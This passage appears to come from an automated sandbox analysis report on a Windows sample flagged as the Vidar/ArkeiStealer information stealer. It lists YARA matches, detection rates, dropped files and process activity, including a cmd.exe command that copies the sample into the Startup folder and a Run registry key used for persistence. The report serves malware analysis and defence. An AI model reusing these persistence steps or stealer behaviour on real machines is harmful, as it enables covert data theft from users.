                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00C798D417_2_00C798D4
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00DA995B17_2_00DA995B
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00DA926317_2_00DA9263
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00DA8D1F17_2_00DA8D1F
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00C7451D17_2_00C7451D
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00DAA6BC17_2_00DAA6BC
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00DA87DB17_2_00DA87DB
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_0041F23017_2_0041F230
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_0042E34717_2_0042E347
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_0043440017_2_00434400
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_0042D74217_2_0042D742
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_0042E72F17_2_0042E72F
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_0043581417_2_00435814
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_0043395E17_2_0043395E
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_0040490A17_2_0040490A
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00434ADC17_2_00434ADC
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00405AA517_2_00405AA5
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_0041CB7217_2_0041CB72
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_0042DBD717_2_0042DBD7
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00419D4F17_2_00419D4F
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00405E2617_2_00405E26
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00433EAF17_2_00433EAF
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_0042DF7517_2_0042DF75
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_0041BF1217_2_0041BF12
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00406FE617_2_00406FE6
                        Source: 0XzeMRyE1e.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: 0XzeMRyE1e.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: file_22613[1].exe.13.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: file_22613.exe.13.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: 0XzeMRyE1e.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                        Source: 17.3.file_22613.exe.d5d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                        Source: 17.3.file_22613.exe.d5d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Vidar author = ditekSHen, description = Detects Vidar / ArkeiStealer
                        Source: 17.2.file_22613.exe.14a3460.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                        Source: 17.2.file_22613.exe.14a3460.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Vidar author = ditekSHen, description = Detects Vidar / ArkeiStealer
                        Source: 17.2.file_22613.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                        Source: 17.2.file_22613.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Vidar author = ditekSHen, description = Detects Vidar / ArkeiStealer
                        Source: 18.2.file_22613.exe.f840000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                        Source: 18.2.file_22613.exe.f840000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Vidar author = ditekSHen, description = Detects Vidar / ArkeiStealer
                        Source: 17.2.file_22613.exe.14a3460.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                        Source: 17.2.file_22613.exe.14a3460.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Vidar author = ditekSHen, description = Detects Vidar / ArkeiStealer
                        Source: 00000011.00000003.465212965.000000000D5D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                        Source: 00000011.00000003.465212965.000000000D5D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Vidar author = ditekSHen, description = Detects Vidar / ArkeiStealer
                        Source: Process Memory Space: 0XzeMRyE1e.exe PID: 3220, type: MEMORYSTRMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
                        Source: Process Memory Space: 0XzeMRyE1e.exe PID: 6456, type: MEMORYSTRMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: String function: 00413196 appears 54 times
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: String function: 00402150 appears 47 times
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: String function: 00413810 appears 38 times
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: String function: 004120D0 appears 52 times
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: String function: 00412440 appears 118 times
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: String function: 00424400 appears 54 times
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: String function: 00421975 appears 42 times
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: String function: 00412D6E appears 45 times
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: String function: 004219DE appears 39 times
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: String function: 00402BD4 appears 290 times
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: String function: 00C74DC8 appears 33 times
                        Source: 0XzeMRyE1e.exeBinary or memory string: OriginalFilename vs 0XzeMRyE1e.exe
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.308497314.0000000008DC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMm.dll4 vs 0XzeMRyE1e.exe
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.308828876.00000000094E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameClassLibrary1.dll< vs 0XzeMRyE1e.exe
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.304281793.00000000037B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMm.dll4 vs 0XzeMRyE1e.exe
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.300192087.0000000000438000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameZonli.exe, vs 0XzeMRyE1e.exe
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.301026710.00000000027CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameClassLibrary1.dll< vs 0XzeMRyE1e.exe
                        Source: 0XzeMRyE1e.exe, 0000000D.00000000.297399264.0000000000738000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameZonli.exe, vs 0XzeMRyE1e.exe
                        Source: 0XzeMRyE1e.exe, 00000010.00000002.449695273.0000000008950000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMm.dll4 vs 0XzeMRyE1e.exe
                        Source: 0XzeMRyE1e.exe, 00000010.00000002.446165725.0000000003708000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMm.dll4 vs 0XzeMRyE1e.exe
                        Source: 0XzeMRyE1e.exe, 00000010.00000002.450200051.0000000008C00000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameClassLibrary1.dll< vs 0XzeMRyE1e.exe
                        Source: 0XzeMRyE1e.exe, 00000010.00000002.430096466.000000000271F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameClassLibrary1.dll< vs 0XzeMRyE1e.exe
                        Source: 0XzeMRyE1e.exe, 00000010.00000002.429393442.0000000000448000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilenameZonli.exe, vs 0XzeMRyE1e.exe
                        Source: 0XzeMRyE1e.exe, 00000015.00000000.409956691.0000000000D88000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilenameZonli.exe, vs 0XzeMRyE1e.exe
                        Source: 0XzeMRyE1e.exeBinary or memory string: OriginalFilenameZonli.exe, vs 0XzeMRyE1e.exe
                        Source: 0XzeMRyE1e.exe.7.drBinary or memory string: OriginalFilenameZonli.exe, vs 0XzeMRyE1e.exe
                        Source: file_22613[1].exe.13.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: file_22613.exe.13.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: 0XzeMRyE1e.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\0XzeMRyE1e.exe.logJump to behavior
                        Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@13/5@9/8
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: 0XzeMRyE1e.exeVirustotal: Detection: 36%
                        Source: 0XzeMRyE1e.exeMetadefender: Detection: 14%
                        Source: 0XzeMRyE1e.exeReversingLabs: Detection: 65%
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\0XzeMRyE1e.exe "C:\Users\user\Desktop\0XzeMRyE1e.exe"
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c Copy "C:\Users\user\Desktop\0XzeMRyE1e.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess created: C:\Users\user\Desktop\0XzeMRyE1e.exe C:\Users\user\Desktop\0XzeMRyE1e.exe
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe"
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess created: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe "C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe "C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe "C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe"
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c Copy "C:\Users\user\Desktop\0XzeMRyE1e.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess created: C:\Users\user\Desktop\0XzeMRyE1e.exe C:\Users\user\Desktop\0XzeMRyE1e.exeJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess created: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe "C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeFile created: C:\Users\user\AppData\Local\Temp\1000007001\Jump to behavior
                        Source: 0XzeMRyE1e.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_004163E3 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,17_2_004163E3
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6008:120:WilError_01
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeMutant created: \Sessions\1\BaseNamedObjects\d06ed635-68f6-4e9a-955c-90ce-806e6f6e6963user4
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeMutant created: \Sessions\1\BaseNamedObjects\152138533219352125563209
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: 0XzeMRyE1e.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: 0XzeMRyE1e.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Source: 0XzeMRyE1e.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: 0XzeMRyE1e.exe, 0XzeMRyE1e.exe, 0000000D.00000000.298445162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 0XzeMRyE1e.exe, 0000000D.00000000.297328127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 0XzeMRyE1e.exe, 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 0XzeMRyE1e.exe, 00000010.00000002.446415275.0000000003832000.00000004.00000800.00020000.00000000.sdmp, 0XzeMRyE1e.exe, 00000010.00000002.446348077.00000000037A0000.00000004.00000800.00020000.00000000.sdmp, 0XzeMRyE1e.exe, 00000010.00000002.430096466.000000000271F000.00000004.00000800.00020000.00000000.sdmp, 0XzeMRyE1e.exe, 00000015.00000000.428197655.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 0XzeMRyE1e.exe, 00000015.00000002.430278226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 0XzeMRyE1e.exe, 00000015.00000000.418537482.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                        Source: Binary string: C:\Tex\Ras sav\Quevah\Bopo nan.pdb source: file_22613.exe, file_22613.exe, 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, file_22613.exe, 00000011.00000000.330984448.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, file_22613.exe, 00000012.00000002.508562908.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, file_22613.exe, 00000012.00000000.360616448.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, file_22613.exe, 00000014.00000000.380119657.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, file_22613.exe, 00000014.00000002.508484154.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, file_22613[1].exe.13.dr, file_22613.exe.13.dr
                        Source: Binary string: C:\Users\Administrator\Desktop\PRIVATESTUB - powershell\ClassLibrary1\obj\Release\ClassLibrary1.pdb source: 0XzeMRyE1e.exe, 00000000.00000002.308828876.00000000094E0000.00000004.08000000.00040000.00000000.sdmp, 0XzeMRyE1e.exe, 00000000.00000002.301026710.00000000027CF000.00000004.00000800.00020000.00000000.sdmp, 0XzeMRyE1e.exe, 00000010.00000002.450200051.0000000008C00000.00000004.08000000.00040000.00000000.sdmp, 0XzeMRyE1e.exe, 00000010.00000002.430096466.000000000271F000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\Administrator\Desktop\attachments\obj\Debug\Zonli.pdb source: 0XzeMRyE1e.exe, 0XzeMRyE1e.exe.7.dr
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 0_2_08DCA5B7 pushfd ; retf 0_2_08DCA5DF
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 0_2_04CE062B push eax; mov dword ptr [esp], ecx0_2_04CE063C
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 0_2_04CE0638 push eax; mov dword ptr [esp], ecx0_2_04CE063C
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 13_2_00413856 push ecx; ret 13_2_00413869
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 13_2_0042FE75 push esi; ret 13_2_0042FE7E
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeCode function: 16_2_00C640C3 push eax; ret 16_2_00C640CA
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeCode function: 16_2_00C68701 push 24418B02h; ret 16_2_00C68713
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeCode function: 16_2_00C651CB push 690804C3h; ret 16_2_00C651D2
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeCode function: 16_2_00C69C1B push 14418B02h; ret 16_2_00C69C23
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeCode function: 16_2_069880A2 push es; ret 16_2_069880B0
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeCode function: 16_2_0698FD70 push es; ret 16_2_0698FD80
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeCode function: 16_2_0698EA7A push 00000003h; ret 16_2_0698EA7C
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00C648EB push ebp; retf 17_2_00C648EE
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00C6485B push esi; iretd 17_2_00C6485D
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00C67EFD push ds; retf 17_2_00C67F09
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00C68664 pushfd ; iretd 17_2_00C6867A
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00C74E0D push ecx; ret 17_2_00C74E20
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00C68757 push ecx; ret 17_2_00C68758
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00424445 push ecx; ret 17_2_00424458
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00421A4D push ecx; ret 17_2_00421A60
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00C7DA0D LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,17_2_00C7DA0D
                        Source: initial sampleStatic PE information: section name: .text entropy: 7.66967630829
                        Source: initial sampleStatic PE information: section name: .text entropy: 7.66967630829

                        Persistence and Installation Behavior

                        barindex
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 0000000D.00000002.509327209.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.509308584.0000000000D40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeJump to dropped file
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeFile created: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeJump to dropped file
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\file_22613[1].exeJump to dropped file

                        Boot Survival

                        barindex
                        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeJump to dropped file
                        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe\:Zone.Identifier:$DATAJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run file_22613.exeJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run file_22613.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00419473 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,17_2_00419473
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
